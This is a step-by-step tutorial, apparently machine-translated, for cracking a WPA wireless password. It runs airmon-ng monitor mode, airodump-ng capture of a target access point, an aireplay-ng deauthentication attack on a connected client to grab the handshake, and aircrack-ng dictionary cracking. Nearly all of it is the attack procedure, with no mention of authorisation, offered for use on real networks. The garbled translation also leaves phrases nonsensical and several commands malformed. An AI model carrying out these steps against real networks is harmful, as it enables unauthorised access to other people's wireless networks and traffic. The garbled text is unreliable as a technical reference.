In addition to preparing a good tool for cracking wireless passwords, you also need to wash your face. In addition to the above, you need to successfully capture the wireless password. in addition to cap, the size of a dictionary that runs the password determines the success rate of your cracking. Of course, the larger the dictionary, the longer it takes. if it is a small dictionary, you can clean your face and run it out. it took nearly 8 hours to run the 3G dictionary on my own machine, and not necessarily only BT5 and Kali were able to crack it. Basically, ubuntu and debian can be used. windows also has a ready-made GUI tool -------------------- I am an evil splitting line ------------------ 1> open the wicd network manager of BT5 and select a signal, then click "properties )". click "Information (attributes) in the dialog box to view the MAC address and channel number of the AP. 2> ifconfig to view the name of your wireless network card, here, my wireless network card name is wlan0.3> enable wireless monitoring airmon-ng start wireless device name channel number eg: airmon-ng start wlan0 4 // If the XXXX process is affected, run kill XXX As the process number, then execute the preceding statement again until no error is reported. 4> after monitoring is enabled, select the target AP and execute the following command airodump-ng-w loiter-c 4 -- bssid AP's MAC mon0/ /* AP's MAC is the MAC address of the previously viewed AP, in this case, we only need to see the address of the BSSID is ap mac. the address in STATION is cp mac, and then select an active * // 5> Based on the MAC address of the Client to open a new terminal. Do not close the previous terminal, enter aireplay-ng-0 10-a AP's MAC-c CP's MAC mon0 // AP's MAC is the address under BSSID on the new terminal, CP's MAC is the address in the STATION. After CP executes the command, it returns to the first terminal to check whether the WAP Handshake flag exists. If so, the Handshake is captured. if not, execute the command until 6> execute aircrack-ng-w password.txt-B AP's MAC loiter. cap // password.txt is a dictionary file, and the configured file also needs to be placed under the default path 7> the time to view the face is reached, and the password is displayed when the attack is successful. no reference. you can google the related successes. 8> explanations of various commands and problems encountered in Step 6: airodump-ng-w loiter-c 4 -- bssid AP's MAC mon0 //* from mon0, the data of the Wireless AP is obtained through 4 channels, save to loiter. cap file, usually in the root directory, if the object is flushed multiple times, then the file name increments loiter-001.cap-w loiter: the object name;-c 4: channel 4 * // aireplay-ng-0 10-a AP's MAC-c CP's MAC mon0 //-a: AP's MAC;-c: CP's MAC, this command may be aircrack-ng-w password.txt-B AP's MAC loiter once the client is disconnected. an error may occur when running the cap command directly because the path is incorrect. the above command takes my own machine as an example to write aircrack-ng-w/root/Dictionary/pw3G.txt-B AP's MAC/root/loiter. cap